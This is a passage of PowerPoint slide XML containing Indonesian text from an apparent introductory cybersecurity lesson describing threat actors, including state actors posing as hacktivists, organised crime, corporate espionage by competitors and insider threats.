            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>." </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cenderung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyamar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kelompok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>independen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> hacktivist. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kampanye</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disinformasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>palsu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencoba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melibatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> negara lain.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kejahatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Terorganisir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pesaing</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> negara, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kejahatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dunia maya </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melampaui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kejahatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jumlah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>insiden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerugian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kejahatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terorganisir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beroperasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di Internet </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>yurisdiksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>korbannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kompleksitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penuntutan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penjahat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peluang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendapatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keuntungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kegiatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penipuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keuangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>individu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> - dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemerasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemerasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Sebagian </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>spionase</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperkirakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> negara, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbayangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nakal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>spionase</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melawan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> para </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesaingnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semacam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bertujuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencurian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengganggu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesaing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merusak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>reputasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesaing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>difasilitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karyawan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berpindah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membawa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengetahuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> orang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Internal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Banyak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beroperasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksternal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>targetkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Aktor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksternal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>izin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> internal (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> orang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
